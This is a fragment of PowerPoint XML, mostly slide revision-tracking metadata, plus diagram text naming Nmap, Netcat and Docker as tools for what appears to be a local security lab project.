            <pc:docMk/>
            <pc:sldMk cId="4149463705" sldId="262"/>
            <ac:spMk id="2" creationId="{8705B7DF-B33A-97FC-4046-3DEE92535744}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:26:59.042" v="172" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4149463705" sldId="262"/>
            <ac:spMk id="3" creationId="{72E84EBB-D1FF-AD52-D0D0-1A2D3518A9AD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:cxnChg chg="add">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:17:31.730" v="86" actId="26606"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4149463705" sldId="262"/>
            <ac:cxnSpMk id="8" creationId="{0B5F7E3B-C5F1-40E0-A491-558BAFBC1127}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modTransition setBg setClrOvrMap">
        <pc:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:30:26.301" v="227" actId="122"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1843472474" sldId="263"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:30:26.301" v="227" actId="122"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1843472474" sldId="263"/>
            <ac:spMk id="2" creationId="{B816CD19-1208-10DF-1631-3987F6029475}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:27:16.507" v="176" actId="255"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1843472474" sldId="263"/>
            <ac:spMk id="3" creationId="{C2617150-3FC8-1AA8-4805-24497FF6532C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:17:44.826" v="87" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1843472474" sldId="263"/>
            <ac:spMk id="8" creationId="{A65AC7D1-EAA9-48F5-B509-60A7F50BF703}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:17:44.826" v="87" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1843472474" sldId="263"/>
            <ac:spMk id="10" creationId="{D6320AF9-619A-4175-865B-5663E1AEF4C5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:17:44.826" v="87" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1843472474" sldId="263"/>
            <ac:spMk id="16" creationId="{7E018740-5C2B-4A41-AC1A-7E68D1EC1954}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:17:44.826" v="87" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1843472474" sldId="263"/>
            <ac:spMk id="18" creationId="{166F75A4-C475-4941-8EE2-B80A06A2C1BB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:17:44.826" v="87" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1843472474" sldId="263"/>
            <ac:spMk id="20" creationId="{A032553A-72E8-4B0D-8405-FF9771C9AF05}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:17:44.826" v="87" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1843472474" sldId="263"/>
            <ac:spMk id="22" creationId="{765800AC-C3B9-498E-87BC-29FAE4C76B21}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:17:44.826" v="87" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1843472474" sldId="263"/>
            <ac:spMk id="24" creationId="{1F9D6ACB-2FF4-49F9-978A-E0D5327FC635}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:17:44.826" v="87" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1843472474" sldId="263"/>
            <ac:spMk id="26" creationId="{142BFA2A-77A0-4F60-A32A-685681C84889}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modTransition setBg">
        <pc:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:27:47.991" v="187" actId="27636"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1243026451" sldId="264"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:27:40.861" v="184" actId="122"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1243026451" sldId="264"/>
            <ac:spMk id="2" creationId="{A26F1515-5FFA-5404-957C-CD8466976FBE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:27:47.991" v="187" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1243026451" sldId="264"/>
            <ac:spMk id="3" creationId="{64BDDC35-A3BC-93A7-49E6-1ED06A4B888C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:17:49.516" v="88" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1243026451" sldId="264"/>
            <ac:spMk id="9" creationId="{518E5A25-92C5-4F27-8E26-0AAAB0CDC85E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:17:49.516" v="88" actId="26606"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1243026451" sldId="264"/>
            <ac:picMk id="5" creationId="{D11F4CE2-A4AE-EFEE-82A4-0E91662FE5AF}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modTransition setBg">
        <pc:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:30:35.682" v="228" actId="122"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1098640180" sldId="265"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:30:35.682" v="228" actId="122"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1098640180" sldId="265"/>
            <ac:spMk id="2" creationId="{EB5E6A5D-684C-E78D-D7E4-D96E8FAD3774}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:28:12.838" v="193" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1098640180" sldId="265"/>
            <ac:spMk id="3" creationId="{3E14B192-C2B8-20FA-3CB5-B7D2BA6DA288}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:18:04.271" v="90" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1098640180" sldId="265"/>
            <ac:spMk id="9" creationId="{518E5A25-92C5-4F27-8E26-0AAAB0CDC85E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:18:08.920" v="92" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1098640180" sldId="265"/>
            <ac:spMk id="12" creationId="{EB6743CF-E74B-4A3C-A785-599069DB89DF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:18:08.945" v="93" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1098640180" sldId="265"/>
            <ac:spMk id="15" creationId="{518E5A25-92C5-4F27-8E26-0AAAB0CDC85E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:18:04.271" v="90" actId="26606"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1098640180" sldId="265"/>
            <ac:picMk id="5" creationId="{6BFE0AC8-272A-AD8C-B192-51DD013D6A4B}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:18:08.920" v="92" actId="26606"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1098640180" sldId="265"/>
            <ac:picMk id="11" creationId="{61365FC8-E4FE-F895-30B4-F15BD39ABDB4}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:18:08.945" v="93" actId="26606"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1098640180" sldId="265"/>
            <ac:picMk id="14" creationId="{6BFE0AC8-272A-AD8C-B192-51DD013D6A4B}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modTransition setBg setClrOvrMap">
        <pc:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:30:49.955" v="230" actId="122"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1118869242" sldId="266"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:30:49.955" v="230" actId="122"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1118869242" sldId="266"/>
            <ac:spMk id="2" creationId="{2C12EC6F-704B-C9FC-DE1A-0C165243C3C1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:28:37.485" v="200" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1118869242" sldId="266"/>
            <ac:spMk id="3" creationId="{ECD62D1A-C67D-C9AE-8A23-92C6AC022D21}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:18:24.727" v="94" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1118869242" sldId="266"/>
            <ac:spMk id="8" creationId="{A65AC7D1-EAA9-48F5-B509-60A7F50BF703}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:18:24.727" v="94" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1118869242" sldId="266"/>
            <ac:spMk id="10" creationId="{D6320AF9-619A-4175-865B-5663E1AEF4C5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:18:24.727" v="94" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1118869242" sldId="266"/>
            <ac:spMk id="16" creationId="{7E018740-5C2B-4A41-AC1A-7E68D1EC1954}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:18:24.727" v="94" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1118869242" sldId="266"/>
            <ac:spMk id="18" creationId="{166F75A4-C475-4941-8EE2-B80A06A2C1BB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:18:24.727" v="94" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1118869242" sldId="266"/>
            <ac:spMk id="20" creationId="{A032553A-72E8-4B0D-8405-FF9771C9AF05}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:18:24.727" v="94" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1118869242" sldId="266"/>
            <ac:spMk id="22" creationId="{765800AC-C3B9-498E-87BC-29FAE4C76B21}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:18:24.727" v="94" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1118869242" sldId="266"/>
            <ac:spMk id="24" creationId="{1F9D6ACB-2FF4-49F9-978A-E0D5327FC635}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:18:24.727" v="94" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1118869242" sldId="266"/>
            <ac:spMk id="26" creationId="{142BFA2A-77A0-4F60-A32A-685681C84889}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modTransition setBg setClrOvrMap">
        <pc:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:30:44.782" v="229" actId="122"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2129393782" sldId="267"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:30:44.782" v="229" actId="122"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2129393782" sldId="267"/>
            <ac:spMk id="2" creationId="{0E7CA78D-36C9-953B-DC42-202EB3A13F5C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:29:20.203" v="216" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2129393782" sldId="267"/>
            <ac:spMk id="3" creationId="{F0C5DA51-0B06-143E-797D-171BE450EEC0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:18:30.538" v="95" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2129393782" sldId="267"/>
            <ac:spMk id="8" creationId="{A65AC7D1-EAA9-48F5-B509-60A7F50BF703}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:18:30.538" v="95" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2129393782" sldId="267"/>
            <ac:spMk id="10" creationId="{D6320AF9-619A-4175-865B-5663E1AEF4C5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:18:30.538" v="95" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2129393782" sldId="267"/>
            <ac:spMk id="16" creationId="{7E018740-5C2B-4A41-AC1A-7E68D1EC1954}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:18:30.538" v="95" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2129393782" sldId="267"/>
            <ac:spMk id="18" creationId="{166F75A4-C475-4941-8EE2-B80A06A2C1BB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:18:30.538" v="95" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2129393782" sldId="267"/>
            <ac:spMk id="20" creationId="{A032553A-72E8-4B0D-8405-FF9771C9AF05}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:18:30.538" v="95" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2129393782" sldId="267"/>
            <ac:spMk id="22" creationId="{765800AC-C3B9-498E-87BC-29FAE4C76B21}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:18:30.538" v="95" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2129393782" sldId="267"/>
            <ac:spMk id="24" creationId="{1F9D6ACB-2FF4-49F9-978A-E0D5327FC635}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:18:30.538" v="95" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2129393782" sldId="267"/>
            <ac:spMk id="26" creationId="{142BFA2A-77A0-4F60-A32A-685681C84889}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod modTransition">
        <pc:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:58:38.050" v="498"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="359439903" sldId="268"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:29:38.167" v="219" actId="122"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="359439903" sldId="268"/>
            <ac:spMk id="2" creationId="{4E46AA30-6A09-3965-7220-AE2803ED17CD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042CCD-BB3D-4DDE-BD62-5095C324BAD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3E2DF8CF-B68D-4925-B3EE-8FAF10C8025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>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>Nmap for the network and service enumeration.</a:t>
          </a:r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844FC4-2FDA-4302-B936-4915DC6C122E}" type="parTrans" cxnId="{4AB78ABC-0366-4630-AD06-4CC7F986AC88}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F7454E2F-3F7F-4121-B92B-E6D06D589CF7}" type="sibTrans" cxnId="{4AB78ABC-0366-4630-AD06-4CC7F986AC88}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7B8FCDF4-B11A-4905-9A1A-D6899A9EDD8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 err="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>Netcat</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t> (</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" err="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>nc</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>) for manual service interaction, AND banner grabbing.</a:t>
          </a:r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C89A9DD-139A-4C0F-8B9F-1DD5AE3BE975}" type="parTrans" cxnId="{94C078FC-8319-434C-B4E4-FFCE9133B71A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2DFBD1DA-1BA6-49FA-8363-69DD9B163BBA}" type="sibTrans" cxnId="{94C078FC-8319-434C-B4E4-FFCE9133B71A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{923AEA18-2F54-4902-80FE-19FD64E8CC9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>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>Docker for setting up the local Secure Server environment.</a:t>
          </a:r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81A15CB-892A-41D0-9418-9F73B8826FD0}" type="parTrans" cxnId="{5F97B8CD-E3EE-422D-844E-C3C43F27B7B4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{43CA5CFD-33E2-4D1C-AFEB-9B7B8D380D50}" type="sibTrans" cxnId="{5F97B8CD-E3EE-422D-844E-C3C43F27B7B4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
